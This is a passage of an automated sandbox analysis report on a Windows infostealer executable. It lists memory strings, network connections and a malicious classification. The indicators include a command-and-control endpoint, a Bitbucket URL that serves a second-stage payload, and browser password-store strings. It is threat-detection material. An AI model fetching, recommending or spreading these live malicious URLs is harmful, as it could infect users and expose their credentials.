                Source: mG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: mG83m82qhF.exe, 00000000.00000003.1630581541.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005907847.0000000000B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005907847.0000000000B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443YKJ
                Source: mG83m82qhF.exe, 00000000.00000003.1630581541.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005907847.0000000000B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                Source: mG83m82qhF.exe, 00000000.00000003.1630581541.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B17000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005907847.0000000000B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/b=
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: mG83m82qhF.exe, 00000000.00000002.2005363639.000000000081B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe1
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                Source: mG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1426240498.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/2=C
                Source: mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453035473.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453162697.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453850480.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453566886.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454050433.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452841763.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/=I
                Source: mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/DA
                Source: mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/I
                Source: mG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/RD
                Source: mG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/Use
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630535859.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/Win
                Source: mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1557063908.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556926556.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1426240498.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1477122557.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556895579.0000000000B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api
                Source: mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apiit
                Source: mG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apimI
                Source: mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apip
                Source: mG83m82qhF.exe, 00000000.00000003.1477122557.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apite
                Source: mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/mI
                Source: mG83m82qhF.exe, 00000000.00000003.1452641021.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/ou
                Source: mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pi5I
                Source: mG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/piEH
                Source: mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/s
                Source: mG83m82qhF.exe, 00000000.00000003.1456773192.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630482824.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1456317993.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454484117.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455686356.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454724980.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452841763.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454957001.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455318191.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454050433.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455516828.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454264424.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455783102.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453162697.0000000000B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/api
                Source: mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/apiyr
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                Source: mG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: mG83m82qhF.exe, 00000000.00000003.1609775563.00000000052A4000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2008127945.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.000000000529F000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: mG83m82qhF.exe, 00000000.00000002.2008127945.0000000005274000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: mG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49763 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.10:49769 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.217.136.89:443 -> 192.168.2.10:49775 version: TLS 1.2

                System Summary

                barindex
                Source: mG83m82qhF.exeStatic PE information: section name:
                Source: mG83m82qhF.exeStatic PE information: section name: .rsrc
                Source: mG83m82qhF.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 2040
                Source: mG83m82qhF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: mG83m82qhF.exeStatic PE information: Section: ZLIB complexity 0.997418129280822
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7704
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\5ccc1f99-0da8-45a5-8274-4fb77917e5afJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: mG83m82qhF.exe, 00000000.00000003.1375854213.0000000005219000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375695924.0000000005236000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: mG83m82qhF.exeVirustotal: Detection: 54%
                Source: mG83m82qhF.exeReversingLabs: Detection: 63%
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile read: C:\Users\user\Desktop\mG83m82qhF.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\mG83m82qhF.exe "C:\Users\user\Desktop\mG83m82qhF.exe"
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 2040
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeSection loaded: schannel.dllJump to behavior
